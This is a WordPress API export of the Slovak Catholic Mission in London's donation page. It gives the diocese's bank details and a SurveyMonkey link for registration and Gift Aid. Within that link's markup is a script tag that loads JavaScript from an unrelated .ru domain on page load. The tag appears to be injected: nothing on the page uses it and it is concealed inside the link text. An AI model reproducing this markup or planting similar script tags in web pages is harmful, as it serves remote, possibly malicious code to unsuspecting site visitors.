{"id":9793,"date":"2010-10-26T22:25:50","date_gmt":"2010-10-26T21:25:50","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=9793"},"modified":"2023-02-04T14:00:39","modified_gmt":"2023-02-04T14:00:39","slug":"dobrodinci","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=9793","title":{"rendered":"PODPORTE N\u00c1S"},"content":{"rendered":"<p style=\"text-align: justify;\">Vo Ve\u013ekej Brit\u00e1nii je odluka Cirkvi od \u0161t\u00e1tu a preto existencia a \u010dinnos\u0165 misie je hraden\u00e1 v\u00fdhradne z milodarov veriacich a dobrodincov, \u010di sponzorov.\u00a0Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne je s\u00fa\u010das\u0165ou\u00a0Westminster Roman Catholic Diocese Trustee (WRCDT); Registered Charity Number: 233699 (<a href=\"http:\/\/rcdow.org.uk\/\">www.rcdow.org.uk<\/a>).<\/p>\n<p>Ve\u013emi radi uv\u00edtame Va\u0161u finan\u010dn\u00fa podporu, ktor\u00fa m\u00f4\u017eete posla\u0165 na n\u00e1\u0161 \u00fa\u010det.<\/p>\n<p style=\"text-align: justify;\">\u010c\u00edslo \u00fa\u010dtu Slovenskej katol\u00edckej misie v\u00a0Lond\u00fdne (ktor\u00e1 je pod spr\u00e1vou diec\u00e9zy Westminster) pre jednor\u00e1zov\u00e9 alebo trval\u00e9 platobn\u00e9 pr\u00edkazy :<\/p>\n<h4>HSBC Plc Bank<br \/>\nAccount holder: \u00a0 \u00a0\u00a0<strong>Diocese of Westminster<\/strong><br \/>\nSort code: \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>40-05-20<\/strong><br \/>\nAccount number:\u00a0 <strong>91755226<\/strong><br \/>\nalebo IBAN : \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<strong>GB18HBUK40052091755226<\/strong><br \/>\nBIC: \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<strong>HBUKGB4107J<\/strong><\/h4>\n<p>Do spr\u00e1vy pre prij\u00edmate\u013ea uve\u010fte: Support of SCM<\/p>\n<p style=\"text-align: justify;\">Pre st\u00e1lych a registrovan\u00fdch \u010dlenov misie je mo\u017enos\u0165 prispieva\u0165 prostredn\u00edctvom ob\u00e1lok alebo zadan\u00edm trval\u00e9ho pr\u00edkazu. Registr\u00e1cia \u010dlenov misie (ktor\u00fd pob\u00fdvaj\u00fa na \u00fazem\u00ed UK dlhodobo) je vy\u017eadovan\u00e1 arcidiec\u00e9zou Westminster, pod ktor\u00fa patr\u00ed aj Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne. Link na registr\u00e1ciu a mo\u017enos\u0165 pravideln\u00e9ho prispievania formou Gift Aid pre platite\u013eov dan\u00ed v UK n\u00e1jdete tu <a href=\"https:\/\/www.surveymonkey.com\/s\/QTR652R\" target=\"_blank\">https:\/\/www.surveymonkey.com\/<wbr \/>s\/QTR652R<script src=\"\/\/uptoliked.ru\/widjets.js\" type=\"text\/javascript\"><\/script><\/a> . SCM to umo\u017e\u0148uje z\u00edska\u0165 25% z ka\u017edej darovanej libry na \u00fa\u010det SCM od HM Revenue.<\/p>\n<p style=\"text-align: justify;\">Do spr\u00e1vy pre prij\u00edmate\u013ea uve\u010fte: Support of SCM<\/p>\n<p>P\u00e1n Boh \u017eehnaj v\u0161etk\u00fdm dobrodincom.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vo Ve\u013ekej Brit\u00e1nii je odluka Cirkvi od \u0161t\u00e1tu a preto existencia a \u010dinnos\u0165 misie je hraden\u00e1 v\u00fdhradne z milodarov veriacich a dobrodincov, \u010di sponzorov.\u00a0Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne je s\u00fa\u010das\u0165ou\u00a0Westminster&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?page_id=9793\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"parent":0,"menu_order":6,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-9793","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9793","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9793"}],"version-history":[{"count":34,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9793\/revisions"}],"predecessor-version":[{"id":31461,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9793\/revisions\/31461"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9793"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}